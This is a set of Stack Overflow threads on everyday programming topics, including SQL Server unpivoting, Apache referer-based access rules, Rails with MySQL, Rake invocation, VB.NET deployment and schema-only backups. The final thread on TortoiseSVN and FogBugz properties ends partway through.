A: I use Eclipse's Database development plugins - like all Java based SQL editors, it works cross platform with any type 4 (ie pure Java) JDBC driver. It's ok for basic stuff (the main failing is it struggles to give transaction control -- auto-commit=true is always set it seems).
Microsoft have a decent JDBC type 4 driver: http://www.microsoft.com/downloads/details.aspx?FamilyId=6D483869-816A-44CB-9787-A866235EFC7C&displaylang=en this can be used with all Java clients / programs on Win/Mac/Lin/etc.
Those people struggling with Java/JDBC on a Mac are presumably trying to use native drivers instead of JDBC ones -- I haven't used (or practically heard of) the ODBC driver bridge in almost 10 years.
A: It may not be the best solution if you don't already have it, but FileMaker 11 with the Actual SQL Server ODBC driver (http://www.actualtech.com/product_sqlserver.php) worked nicely for a client of mine today. The ODBC driver is only $29, but FileMaker is $299, which is why you might only consider it if you already have it.
A: Try CoRD and modify what you want directly from the server.
It's open source.
http://cord.sourceforge.net/
A: Ed: phpMyAdmin is for MySQL, but the asker needs something for Microsoft SQL Server.
Most solutions that I found involve using an ODBC Driver and then whatever client application you use. For example, Gorilla SQL claims to be able to do that, even though the project seems abandoned.
Most good solutions are either using Remote Desktop or VMware/Parallels.
A: Since there currently isn't a MS SQL client for Mac OS X, I would, as Modesty has suggested, use Remote Desktop for the Mac.
A: For MySQL, there is Querious and Sequel Pro. The former costs US$25, and the latter is free. You can find a comparison of them here, and a list of some other Mac OS X MySQL clients here.
Steve
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3452",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "484"
} |
Q: How do I Transform Sql Columns into Rows? I have a very simple problem which requires a very quick and simple solution in SQL Server 2005.
I have a table with x Columns. I want to be able to select one row from the table and then transform the columns into rows.
TableA
Column1, Column2, Column3
SQL Statement to return
ResultA
Value of Column1
Value of Column2
Value of Column3
@Kevin: I've had a Google search on the topic but a lot of the examples were overly complex for my case; are you able to help further?
@Mario: The solution I am creating has 10 columns which store the values 0 to 6 and I must work out how many columns have the value 3 or more. So I thought about creating a query to turn that into rows and then using the generated table in a subquery to, say, count the number of rows with Column >= 3
A: You should take a look at the UNPIVOT clause.
Update1: GateKiller, strangely enough I read an article (about something unrelated) about it this morning and I'm trying to jog my memory where I saw it again, had some decent looking examples too. It'll come back to me I'm sure.
Update2: Found it: http://weblogs.sqlteam.com/jeffs/archive/2008/04/23/unpivot.aspx
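For example, here is a minimal sketch against the TableA from the question (assuming a key column id to pick the row; UNPIVOT requires the unpivoted columns to share a type, and it skips NULLs):
SELECT ColumnName, ColumnValue
FROM (SELECT Column1, Column2, Column3
      FROM TableA
      WHERE id = 1) AS src
UNPIVOT (ColumnValue FOR ColumnName
         IN (Column1, Column2, Column3)) AS unpvt;
You could then wrap this in a subquery and COUNT(*) the rows WHERE ColumnValue >= 3, which matches what the asker is ultimately after.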
A: I had to do this for a project before. One of the major difficulties I had was explaining what I was trying to do to other people. I spent a ton of time trying to do this in SQL, but I found the pivot function woefully inadequate. I do not remember the exact reason why, but it is too simplistic for most applications, and it isn't fully implemented in MS SQL 2000. I wound up writing a pivot function in .NET. I'll post it here in hopes it helps someone, someday.
''' <summary>
''' Pivots a data table from rows to columns
''' </summary>
''' <param name="dtOriginal">The data table to be transformed</param>
''' <param name="strKeyColumn">The name of the column that identifies each row</param>
''' <param name="strNameColumn">The name of the column with the values to be transformed from rows to columns</param>
''' <param name="strValueColumn">The name of the column with the values to pivot into the new columns</param>
''' <returns>The transformed data table</returns>
''' <remarks></remarks>
Public Shared Function PivotTable(ByVal dtOriginal As DataTable, ByVal strKeyColumn As String, ByVal strNameColumn As String, ByVal strValueColumn As String) As DataTable
Dim dtReturn As DataTable
Dim drReturn As DataRow
Dim strLastKey As String = String.Empty
Dim blnFirstRow As Boolean = True
' copy the original data table and remove the name and value columns
dtReturn = dtOriginal.Clone
dtReturn.Columns.Remove(strNameColumn)
dtReturn.Columns.Remove(strValueColumn)
' create a new row for the new data table
drReturn = dtReturn.NewRow
' Fill the new data table with data from the original table
For Each drOriginal As DataRow In dtOriginal.Rows
' Determine if a new row needs to be started
If drOriginal(strKeyColumn).ToString <> strLastKey Then
' If this is not the first row, the previous row needs to be added to the new data table
If Not blnFirstRow Then
dtReturn.Rows.Add(drReturn)
End If
blnFirstRow = False
drReturn = dtReturn.NewRow
' Add all non-pivot column values to the new row
For Each dcOriginal As DataColumn In dtOriginal.Columns
If dcOriginal.ColumnName <> strNameColumn AndAlso dcOriginal.ColumnName <> strValueColumn Then
drReturn(dcOriginal.ColumnName.ToLower) = drOriginal(dcOriginal.ColumnName.ToLower)
End If
Next
strLastKey = drOriginal(strKeyColumn).ToString
End If
' Add new columns if needed and then assign the pivot values to the proper column
If Not dtReturn.Columns.Contains(drOriginal(strNameColumn).ToString) Then
dtReturn.Columns.Add(drOriginal(strNameColumn).ToString, drOriginal(strValueColumn).GetType)
End If
drReturn(drOriginal(strNameColumn).ToString) = drOriginal(strValueColumn)
Next
' Add the final row to the new data table
dtReturn.Rows.Add(drReturn)
' Return the transformed data table
Return dtReturn
End Function
A: UNION should be your friend:
SELECT Column1 FROM table WHERE idColumn = 1
UNION ALL
SELECT Column2 FROM table WHERE idColumn = 1
UNION ALL
SELECT Column3 FROM table WHERE idColumn = 1
but it can also be your foe on large result sets.
A: If you have a fixed set of columns and you know what they are, you can basically do a series of subselects
(SELECT Column1 AS ResultA FROM TableA) as R1
and join the subselects. All this in a single query.
A: I'm not sure of the SQL Server syntax for this but in MySQL I would do
SELECT IDColumn, ( IF( Column1 >= 3, 1, 0 ) + IF( Column2 >= 3, 1, 0 ) + IF( Column3 >= 3, 1, 0 ) + ... [snip ] )
AS NumberOfColumnsGreaterThanThree
FROM TableA;
EDIT: A very (very) brief Google search tells me that the CASE statement does what I am doing with the IF statement in MySQL. You may or may not get use out of the Google result I found
FURTHER EDIT: I should also point out that this isn't an answer to your question but an alternative solution to your actual problem.
A: SELECT IDColumn,
NumberOfColumnsGreaterThanThree = (CASE WHEN Column1 >= 3 THEN 1 ELSE 0 END) +
(CASE WHEN Column2 >= 3 THEN 1 ELSE 0 END) +
(Case WHEN Column3 >= 3 THEN 1 ELSE 0 END)
FROM TableA;
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3470",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "17"
} |
Q: Block user access to internals of a site using HTTP_REFERER I have control over the HttpServer but not over the ApplicationServer or the Java Applications sitting there but I need to block direct access to certain pages on those applications. Precisely, I don't want users automating access to forms issuing direct GET/POST HTTP requests to the appropriate servlet.
So, I decided to block users based on the value of HTTP_REFERER. After all, if the user is navigating inside the site, it will have an appropriate HTTP_REFERER. Well, that was what I thought.
I implemented a rewrite rule in the .htaccess file that says:
RewriteEngine on
# Options +FollowSymlinks
RewriteCond %{HTTP_REFERER} !^http://mywebaddress(.cl)?/.* [NC]
RewriteRule (servlet1|servlet2)/.+\?.+ - [F]
I expected to forbid access to users that didn't navigate the site but issued direct GET requests to the "servlet1" or "servlet2" servlets using querystrings. But my expectations ended abruptly because the regular expression (servlet1|servlet2)/.+\?.+ didn't work at all.
I was really disappointed when I changed that expression to (servlet1|servlet2)/.+ and it worked so well that my users were blocked no matter if they navigated the site or not.
So, my question is: How do I can accomplish this thing of not allowing "robots" with direct access to certain pages if I have no access/privileges/time to modify the application?
A: I'm not sure if I can solve this in one go, but we can go back and forth as necessary.
First, I want to repeat what I think you are saying and make sure I'm clear. You want to disallow requests to servlet1 and servlet2 is the request doesn't have the proper referer and it does have a query string? I'm not sure I understand (servlet1|servlet2)/.+\?.+ because it looks like you are requiring a file under servlet1 and 2. I think maybe you are combining PATH_INFO (before the "?") with a GET query string (after the "?"). It appears that the PATH_INFO part will work but the GET query test will not. I made a quick test on my server using script1.cgi and script2.cgi and the following rules worked to accomplish what you are asking for. They are obviously edited a little to match my environment:
RewriteCond %{HTTP_REFERER} !^http://(www.)?example.(com|org) [NC]
RewriteCond %{QUERY_STRING} ^.+$
RewriteRule ^(script1|script2)\.cgi - [F]
The above caught all wrong-referer requests to script1.cgi and script2.cgi that tried to submit data using a query string. However, you can also submit data using a path_info and by posting data. I used this form to protect against any of the three methods being used with incorrect referer:
RewriteCond %{HTTP_REFERER} !^http://(www.)?example.(com|org) [NC]
RewriteCond %{QUERY_STRING} ^.+$ [OR]
RewriteCond %{REQUEST_METHOD} ^POST$ [OR]
RewriteCond %{PATH_INFO} ^.+$
RewriteRule ^(script1|script2)\.cgi - [F]
Based on the example you were trying to get working, I think this is what you want:
RewriteCond %{HTTP_REFERER} !^http://mywebaddress(.cl)?/.* [NC]
RewriteCond %{QUERY_STRING} ^.+$ [OR]
RewriteCond %{REQUEST_METHOD} ^POST$ [OR]
RewriteCond %{PATH_INFO} ^.+$
RewriteRule (servlet1|servlet2)\b - [F]
Hopefully this at least gets you closer to your goal. Please let us know how it works, I'm interested in your problem.
(BTW, I agree that referer blocking is poor security, but I also understand that reality forces imperfect and partial solutions sometimes, which you seem to already acknowledge.)
A: I don't have a solution, but I'm betting that relying on the referrer will never work because user-agents are free to not send it at all or spoof it to something that will let them in.
A: You can't tell apart users and malicious scripts by their HTTP request. But you can analyze which users are requesting too many pages in too short a time, and block their IP addresses.
A: Javascript is another helpful tool to prevent (or at least delay) screen scraping. Most automated scraping tools don't have a Javascript interpreter, so you can do things like setting hidden fields, etc.
Edit: Something along the lines of this Phil Haack article.
A: Using a referrer is very unreliable as a method of verification. As other people have mentioned, it is easily spoofed. Your best solution is to modify the application (if you can)
You could use a CAPTCHA, or set some sort of cookie or session cookie that keeps track of what page the user last visited (a session would be harder to spoof) and keep track of page view history, and only allow users who have browsed the pages required to get to the page you want to block.
This obviously requires you to have access to the application in question, however it is the most foolproof way (not completely, but "good enough" in my opinion.)
A: I'm guessing you're trying to prevent screen scraping?
In my honest opinion it's a tough one to solve, and trying to fix it by checking the value of HTTP_REFERER is just a sticking plaster.
You could try rate limiting but without actually modifying the app to force some kind of is-this-a-human validation (a CAPTCHA) at some point then you're going to find this hard to prevent.
A: If you're trying to prevent search engine bots from accessing certain pages, make sure you're using a properly formatted robots.txt file.
Using HTTP_REFERER is unreliable because it is easily faked.
Another option is to check the user agent string for known bots (this may require code modification).
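For example, a minimal robots.txt (the servlet paths here are placeholders for your own) would be:
User-agent: *
Disallow: /servlet1/
Disallow: /servlet2/
Keep in mind this only deters well-behaved crawlers; it does nothing against a user deliberately scripting requests.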
A: To make things a little more clear:
*
*Yes, I know that using HTTP_REFERER is completely unreliable and somewhat childish, but I'm pretty sure that the people who learned (from me, maybe?) to make automations with Excel VBA will not know how to subvert an HTTP_REFERER within the time it takes to have the final solution in place.
*I don't have access/privileges to modify the application code. Politics. Do you believe that? So, I must wait until the rights holder makes the changes I requested.
*From previous experience, I know that the requested changes will take two months to get into Production. No, tossing Agile Methodologies books at their heads didn't improve anything.
*This is an intranet app. So I don't have a lot of youngsters trying to undermine my prestige. But I'm young enough to try to undermine the prestige of "a very fancy global consultancy services that comes from India", where, curiously, there is not a single Indian working.
So far, the best answer comes from "Michel de Mare": block users based on their IPs. Well, that I did yesterday. Today I wanted to make something more generic because I have a lot of kangaroo users (jumping from one IP address to another) because they use VPN or DHCP.
A: You might be able to use an anti-CSRF token to achieve what you're after.
This article explains it in more detail: Cross-Site Request Forgeries
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3486",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: What does the term "BODMAS" mean? What is BODMAS and why is it useful in programming?
A: Another version of this (in middle school) was "Please Excuse My Dear Aunt Sally".
*
*Parentheses
*Exponents
*Multiplication
*Division
*Addition
*Subtraction
The mnemonic device was helpful in school, and still useful in programming today.
A: Order of operations in an expression, such as:
foo * (bar + baz^2 / foo)
*
*Brackets first
*Orders (ie Powers and Square Roots, etc.)
*Division and Multiplication (left-to-right)
*Addition and Subtraction (left-to-right)
source: http://www.mathsisfun.com/operation-order-bodmas.html
A: I don't have the power to edit @Michael Stum's answer, but it's not quite correct. He reduces
(i + 4) - (a + b)
to
(i + 4 - a + b)
They are not equivalent. The best reduction I can get for the whole expression is
((i + 4) - (a + b)) * MAGIC_NUMBER - ANOTHER_MAGIC_NUMBER;
or
(i + 4 - a - b) * MAGIC_NUMBER - ANOTHER_MAGIC_NUMBER;
A: When I learned this in grade school (in Canada) it was referred to as BEDMAS:
Brackets
Exponents
Division
Multiplication
Addition
Subtraction
Just for those from this part of the world...
A: http://www.easymaths.com/What_on_earth_is_Bodmas.htm:
What do you think the answer to 2 + 3 x 5 is?
Is it (2 + 3) x 5 = 5 x 5 = 25 ?
or 2 + (3 x 5) = 2 + 15 = 17 ?
BODMAS can come to the rescue and give us rules to follow so that we always get the right answer:
(B)rackets (O)rder (D)ivision (M)ultiplication (A)ddition (S)ubtraction
According to BODMAS, multiplication should always be done before addition, therefore 17 is actually the correct answer according to BODMAS and will also be the answer which your calculator will give if you type in 2 + 3 x 5 .
Why is it useful in programming? No idea, but I assume it's because you can get rid of some brackets. I am a quite defensive programmer, so my lines can look like this:
result = (((i + 4) - (a + b)) * MAGIC_NUMBER) - ANOTHER_MAGIC_NUMBER;
with BODMAS you can make this a bit clearer:
result = (i + 4 - (a + b)) * MAGIC_NUMBER - ANOTHER_MAGIC_NUMBER;
I think I'd still use the first variant - more brackets, but that way I do not have to learn yet another rule and I run less risk of forgetting it and causing those weird, hard-to-debug errors.
Just guessing at that part though.
Mike Stone EDIT: Fixed math as Gaius points out
A: I'm not really sure how applicable to programming the old BODMAS mnemonic is anyways. There is no guarantee on order of operations between languages, and while many keep the standard operations in that order, not all do. And then there are some languages where order of operations isn't really all that meaningful (Lisp dialects, for example). In a way, you're probably better off for programming if you forget the standard order and either use parentheses for everything (e.g. (a*b) + c) or specifically learn the order for each language you work in.
A: I read somewhere that especially in C/C++ splitting your expressions into small statements was better for optimisation; so instead of writing hugely complex expressions in one line, you cache the parts into variables and do each one in steps, then build them up as you go along.
The optimisation routines will use registers in places where you had variables so it shouldn't impact space but it can help the compiler a little.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3510",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "16"
} |
Q: Searching directories for tons of files? I'm using MSVE, and I have my own tiles I'm displaying in layers on top. Problem is, there's a ton of them, and they're on a network server. In certain directories, there are something on the order of 30,000+ files. Initially I called Directory.GetFiles, but once I started testing in a pseudo-real environment, it timed out.
What's the best way to programatically list, and iterate through, this many files?
Edit: My coworker suggested using the MS indexing service. Has anyone tried this approach, and (how) has it worked?
A: I've worked on a SAN system in the past with telephony audio recordings which had issues with numbers of files in a single folder - that system became unusable somewhere near 5,000 (on Windows 2000 Advanced Server with an application in C#.Net 1.1) - the only sensible solution that we came up with was to change the folder structure so that there were a more reasonable number of files. Interestingly Explorer would also time out!
The convention we came up with was a structure that broke things up into years, months and days - but that will depend upon your system and whether you can control the directory structure...
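For illustration only (the names are made up), such a layout might look like \\server\tiles\2008\08\07\tile_0001.tif, so that no single folder ever accumulates more than one day's worth of files.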
A: Definitely split them up. That said, stay as far away from the Indexing Service as you can.
A: None. .NET relies on underlying Windows API calls that really, really hate that amount of files themselves.
As Ronnie says: split them up.
A: You could use DOS?
DIR /s/b > Files.txt
A: You could also look at either indexing the files yourself, or getting a third part app like google desktop or copernic to do it and then interface with their index. I know copernic has an API that you can use to search for any file in their index and it also supports mapping network drives.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3512",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "15"
} |
Q: How do I run Rake tasks within a Ruby script? I have a Rakefile with a Rake task that I would normally call from the command line:
rake blog:post Title
I'd like to write a Ruby script that calls that Rake task multiple times, but the only solution I see is shelling out using `` (backticks) or system.
What's the right way to do this?
A: from timocracy.com:
require 'rake'
def capture_stdout
s = StringIO.new
oldstdout = $stdout
$stdout = s
yield
s.string
ensure
$stdout = oldstdout
end
Rake.application.rake_require 'metric_fetcher', ['../../lib/tasks']
results = capture_stdout {Rake.application['metric_fetcher'].invoke}
A: In a script with Rails loaded (e.g. rails runner script.rb)
def rake(*tasks)
tasks.each do |task|
Rake.application[task].tap(&:invoke).tap(&:reenable)
end
end
rake('db:migrate', 'cache:clear', 'cache:warmup')
A: This works with Rake version 10.0.3:
require 'rake'
app = Rake.application
app.init
# do this as many times as needed
app.add_import 'some/other/file.rake'
# this loads the Rakefile and other imports
app.load_rakefile
app['sometask'].invoke
As knut said, use reenable if you want to invoke multiple times.
A: You can use invoke and reenable to execute the task a second time.
Your example call rake blog:post Title seems to have a parameter. This parameter can be used as a parameter in invoke:
Example:
require 'rake'
task 'mytask', :title do |tsk, args|
p "called #{tsk} (#{args[:title]})"
end
Rake.application['mytask'].invoke('one')
Rake.application['mytask'].reenable
Rake.application['mytask'].invoke('two')
Please replace mytask with blog:post and instead the task definition you can require your rakefile.
This solution will write the result to stdout - but you did not mention that you want to suppress output.
Interesting experiment:
You can also call reenable inside the task definition. This allows a task to reenable itself.
Example:
require 'rake'
task 'mytask', :title do |tsk, args|
p "called #{tsk} (#{args[:title]})"
tsk.reenable #<-- HERE
end
Rake.application['mytask'].invoke('one')
Rake.application['mytask'].invoke('two')
The result (tested with rake 10.4.2):
"called mytask (one)"
"called mytask (two)"
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3530",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "60"
} |
Q: What is the best way to deploy a VB.NET application? Generally I use ClickOnce when I build a VB.NET program, but it has a few downsides. I've never really used anything else, so I'm not sure
what my options are.
Downsides to ClickOnce:
*
*Consists of multiple files - Seems easier to distribute one file than managing a bunch of files and the downloader to download those files.
*You have to build it again for CD installations (for when the end user doesn't have internet)
*Program does not end up in Program Files - It ends up hidden away in some application cache folder, making it much harder to shortcut to.
Pros to ClickOnce:
*
*It works. Magically. And it's built into Visual Studio 2008 Express.
*Makes it easy to upgrade the application.
Does Windows Installer do these things as well? I know it doesn't have any of the ClickOnce cons, but it would be nice to know if it also has the ClickOnce pros.
Update:
I ended up using Wix 2 (Wix 3 was available, but at the time I did the project no one had a competent tutorial). It was nice because it supported the three things I (eventually) needed: an optional start-up-with-Windows shortcut, a start-up-when-the-installer-is-done option, and three paragraphs of text that my boss thinks will keep users from clicking the wrong option.
A: Have you seen WiX yet?
http://wix.sourceforge.net/
It builds windows installers using an XML file and has additional libraries to use if you want to fancify your installers and the like. I'll admit the learning curve for me was medium-high in getting things started, but afterwards I was able to build a second installer without any hassles.
It will handle updates and other items if you so desire, and you can apply folder permissions and the like to the installers. It also gives you greater control on where exactly you want to install files and is compatible with all the standardized Windows folder conventions, so you can specify "PROGRAM_DATA" or something to that effect and the installer knows to put it in C:\Documents and Settings\All Users\Application Data or C:\ProgramData depending on if you're running XP or Vista.
The rumor is that Office 2007 and Visual Studio 2008 used WiX to create their installers, but I haven't been able to verify that anywhere. I do believe it is developed by some Microsoft folks on the inside.
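For orientation, a minimal WiX 3-style source file looks roughly like the sketch below; the product name, file name and GUIDs are placeholders you would replace with your own (candle/light then compile and link it into an .msi):
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
  <Product Id="*" Name="MyApp" Version="1.0.0.0" Language="1033"
           Manufacturer="My Company" UpgradeCode="PUT-GUID-HERE">
    <Package InstallerVersion="200" Compressed="yes" />
    <Media Id="1" Cabinet="product.cab" EmbedCab="yes" />
    <Directory Id="TARGETDIR" Name="SourceDir">
      <Directory Id="ProgramFilesFolder">
        <Directory Id="INSTALLDIR" Name="MyApp">
          <Component Id="MainExecutable" Guid="PUT-GUID-HERE">
            <File Id="MyAppExe" Source="MyApp.exe" KeyPath="yes" />
          </Component>
        </Directory>
      </Directory>
    </Directory>
    <Feature Id="Complete" Level="1">
      <ComponentRef Id="MainExecutable" />
    </Feature>
  </Product>
</Wix>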
A: I agree with Joseph, my experience with ClickOnce is its great for the vast majority of projects especially in a corporate environment where it makes build, publish and deployment easy. Implementing the "forced upgrade" to ensure users have the latest version when running is so much easier in ClickOnce, and a main reason for my usage of it.
Issues with ClickOnce: In a corporate environment it has issues with proxy servers and the workarounds are less than ideal. I've had to deploy a few apps in those cases from UNC paths...but you can't do that all the time. Its "sandbox" is great, until you want to find the executable or create a desktop shortcut.
Have not deployed out of 2008 yet so not sure if those issues still exist.
A: Creating an installer project, with a dependency on your EXE (which in turn depends on whatever it needs) is a fairly straightforward process - but you'll need at least VS Standard Edition for that.
Inside the installer project, you can create custom tasks and dialog steps that allow you to do anything you code up.
What's missing is the auto-upgrade and version-checking magic you get with ClickOnce. You can still build it in, it's just not automatic.
A: I don't believe there is any easy way to make a Windows Installer project have the ease or upgradability of ClickOnce. I use ClickOnce for all the internal .NET apps I develop (with the exception of Console Apps). I find that in an enterprise environment, the ease of deployment outweighs the lack of flexibility.
A: ClickOnce can be problematic if you have 3rd party components that need to be installed along with your product. You can skirt this to some extent by creating installers for the components however with ClickOnce deployment you have to create the logic to update said component installers.
I've in a previous life used Wise For Windows Installer to create installation packages. While creating upgrades with it were not automatic like ClickOnce is, they were more precise and less headache filled when it came to other components that needed to be registered/added.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3544",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "8"
} |
Q: SQL query for a database scheme In SQL Server how do you query a database to bring back all the tables that have a field of a specific name?
A: The following query will bring back a unique list of tables where Column_Name is equal to the column you are looking for:
SELECT Table_Name
FROM INFORMATION_SCHEMA.COLUMNS
WHERE Column_Name = 'Desired_Column_Name'
GROUP BY Table_Name
A: SELECT Table_Name
FROM Information_Schema.Columns
WHERE Column_Name = 'YourFieldName'
A: I'm old-school:
SELECT DISTINCT object_name(id)
FROM syscolumns
WHERE name = 'FIELDNAME'
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3567",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Create a new Ruby on Rails application using MySQL instead of SQLite I want to create my Rails application with MySQL, because I like it so much. How can I do that in the latest version of Rails instead of the default SQLite?
A: $ rails --help
is always your best friend
usage:
$ rails new APP_PATH [options]
also note that options should be given after the application name
rails and mysql
$ rails new project_name -d mysql
rails and postgresql
$ rails new project_name -d postgresql
A: You should use the switch -D instead of -d because it will generate two apps and mysql with no documentation folders.
rails -D mysql project_name (less than version 3)
rails new project_name -D mysql (version 3 and up)
Alternatively you just use the --database option.
A: For Rails 3 you can use this command to create a new project using mysql:
$ rails new projectname -d mysql
A: If you are creating a new rails application you can set the database using the -d switch like this:
rails -d mysql myapp
It's always easy to switch your database later though, and using SQLite really is easier if you are developing on a Mac.
A: In Rails 3, you could do
$rails new projectname --database=mysql
A: Just go to rails console and type:
rails new YOURAPPNAME -d mysql
A: On new project, easy peasy:
rails new your_new_project_name -d mysql
On an existing project, it's definitely trickier. This has given me a number of issues on existing Rails projects. This kind of setup works for me:
# On Gemfile:
gem 'mysql2', '>= 0.3.18', '< 0.5' # copied from a new project for rails 5.1 :)
gem 'activerecord-mysql-adapter' # needed for mysql..
# On Dockerfile or on CLI:
sudo apt-get install -y mysql-client libmysqlclient-dev
A: Normally, you would create a new Rails app using
rails ProjectName
To use MySQL, use
rails new ProjectName -d mysql
A: Go to the terminal and write:
rails new <project_name> -d mysql
A: If you have not created your app yet, just go to cmd (for Windows) or a terminal (for Linux/Unix) and type the following command to create a Rails application with a MySQL database:
$rails new <your_app_name> -d mysql
It works for anything at Rails version 3 and above. If you have already created your app, then you can do one of the following two things:
*
*Create an another_name app with a MySQL database, go to cd another_name/config/ and copy the database.yml file from this new app. Paste it into the database.yml of the your_app_name app. But be sure to change the database names and set the username/password of your database accordingly in the database.yml file after doing so.
OR
*
*Go to cd your_app_name/config/ and open database.yml. Change it as follows:
development:
adapter: mysql2
database: db_name_name
username: root
password:
host: localhost
socket: /tmp/mysql.sock
Moreover, remove gem 'sqlite3' from your Gemfile and add the gem 'mysql2'
A: First make sure that the mysql gem is installed; if not, type the following command in your console:
gem install mysql2
Then create a new Rails app and set MySQL as the default database by typing the following command in your console:
rails new app-name -d mysql
A: If you already have a rails project, change the adapter in the config/database.yml file to mysql and make sure you specify a valid username and password, and optionally, a socket:
development:
adapter: mysql2
database: db_name_dev
username: koploper
password:
host: localhost
socket: /tmp/mysql.sock
Next, make sure you edit your Gemfile to include the mysql2 or activerecord-jdbcmysql-adapter (if using jruby).
A: If you are using rails 3 or greater version
rails new your_project_name -d mysql
if you have earlier version
rails new -d mysql your_project_name
So before you create your project you need to find the Rails version, which you can check with:
rails -v
A: rails -d mysql ProjectName
A: rails new <project_name> -d mysql
OR
rails new projectname
Changes in config/database.yml
development:
adapter: mysql2
database: db_name_name
username: root
password:
host: localhost
socket: /tmp/mysql.sock
A: Create application with -d option
rails new AppName -d mysql
A: Use following command to create new app for API with mysql database
rails new <appname> --api -d mysql
adapter: mysql2
encoding: utf8
pool: 5
username: root
password:
socket: /var/run/mysqld/mysqld.sock
A: database.yml
# MySQL. Versions 5.1.10 and up are supported.
#
# Install the MySQL driver
# gem install mysql2
#
# Ensure the MySQL gem is defined in your Gemfile
# gem 'mysql2'
#
# And be sure to use new-style password hashing:
# https://dev.mysql.com/doc/refman/5.7/en/password-hashing.html
#
default: &default
adapter: mysql2
encoding: utf8
pool: <%= ENV.fetch("RAILS_MAX_THREADS") { 5 } %>
host: localhost
database: database_name
username: username
password: secret
development:
<<: *default
# Warning: The database defined as "test" will be erased and
# re-generated from your development database when you run "rake".
# Do not set this db to the same as development or production.
test:
<<: *default
# As with config/secrets.yml, you never want to store sensitive information,
# like your database password, in your source code. If your source code is
# ever seen by anyone, they now have access to your database.
#
# Instead, provide the password as a unix environment variable when you boot
# the app. Read http://guides.rubyonrails.org/configuring.html#configuring-a-database
# for a full rundown on how to provide these environment variables in a
# production deployment.
#
# On Heroku and other platform providers, you may have a full connection URL
# available as an environment variable. For example:
#
# DATABASE_URL="mysql2://myuser:mypass@localhost/somedatabase"
#
# You can use this database configuration with:
#
# production:
# url: <%= ENV['DATABASE_URL'] %>
#
production:
<<: *default
Gemfile:
# Use mysql as the database for Active Record
gem 'mysql2', '>= 0.4.4', '< 0.6.0'
A: First you should make sure that the MySQL driver is on your system. If it isn't, run this in your terminal (if you are using Ubuntu or any Debian distro):
sudo apt-get install mysql-client libmysqlclient-dev
and add this to your Gemfile
gem 'mysql2', '~> 0.3.16'
then run this in the root directory of the project:
bundle install
After that you can add the MySQL config to config/database.yml as shown in the previous answers.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3585",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "134"
} |
Q: Backup SQL Schema Only? I need to create a backup of a SQL Server 2005 Database that's only the structure...no records, just the schema. Is there any way to do this?
EDIT: I'm trying to create a backup file to use with old processes, so a script wouldn't work for my purposes, sorry
A: Use a 3 step process:
*
*Generate a script from the working database
*Create a new database from that script
*Create a backup of the new database
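Step 3 is just a plain backup. As a minimal sketch (the database name and path here are placeholders, not part of the original answer):
BACKUP DATABASE MyDb_SchemaOnly
TO DISK = N'C:\backups\MyDb_SchemaOnly.bak'
WITH INIT;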
A: Why not just use SQL Management Studio to create a complete script of your database and the objects?
A: I make heavy use of this tool:
SQLBalance for MySQL
Unfortunately, it's Windows-only... but it works like a charm to move databases around, with or without data, and to merge or compare.
A: Toad for SQL Server does this nicely, if you're considering a commercial product.
A: As of SQL Server 2012 (patched), you can make a schema only clone of your database using DBCC CLONEDATABASE. Then simply backup the clone.
dbcc clonedatabase(Demo, Demo_Clone) with verify_clonedb;
alter database [Demo_Clone] set read_write;
backup database [Demo_Clone] to disk = N'C:\temp\Demo_SchemaOnly_20220821.bak';
drop database [Demo_Clone];
Read more here: Schema Only Database Backup
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3589",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: Integrating Fogbugz with TortoiseSVN with no URL/Subversion backend I've got TortoiseSVN installed and have a majority of my repositories checking in and out from C:\subversion\ and a couple checking in and out from a network share (I forgot about this when I originally posted this question).
This means that I don't have a "subversion" server per-se.
How do I integrate TortoiseSVN and Fogbugz?
Edit: inserted italics
A: Why can't you simply install a Subversion server? If you download VisualSVN Server, which is free, you get an HTTP server for your source code and can thus use the FogBugz scripts for integrating the two.
The reason I'm asking is because all scripts and documentation so far assumes you have the server, client-side scripts are too new for FogBugz to have templates for them so you're pretty much left to your own devices on that.
A: I've been investigating this issue and have managed to get it working. There are a couple of minor problems but they can be worked-around.
There are 3 distinct parts to this problem, as follows:
*
*The TortoiseSVN part - getting TortoiseSVN to insert the Bugid and hyperlink in the svn log
*The FogBugz part - getting FogBugz to insert the SVN info and corresponding links
*The WebSVN part - ensuring the links from FogBugz actually work
Instructions for part 1 are in another answer, although it actually does more than required. The stuff about the hooks belongs to part 2, and as is pointed out, it doesn't work "out of the box".
Just to confirm, we are looking at using TortoiseSVN WITHOUT an SVN server (ie. file-based repositories)
I'm accessing the repositories using UNC paths, but it also works for local drives or mapped drives.
All of this works with TortoiseSVN v1.5.3 and SVN Server v1.5.2 (You need to install SVN Server because part 2 needs svnlook.exe which is in the server package. You don't actually configure it to work as an SVN Server) It may even be possible to just copy svnlook.exe from another computer and put it somewhere in your path.
Part 1 - TortoiseSVN
Creating the TortoiseSVN properties is all that is required in order to get the links in the SVN log.
Previous instructions work fine, I'll quote them here for convenience:
Configure the Properties
*
*Right click on the root directory of the checked out project you want to work with.
*Select "TortoiseSVN -> Properties"
*Add five property value pairs by clicking "New..." and inserting the following in "Property Name" and "Property Value" respectively: (make sure you tick "Apply property recursively" for each one)
bugtraq:label BugzID:
bugtraq:message BugzID: %BUGID%
bugtraq:number true
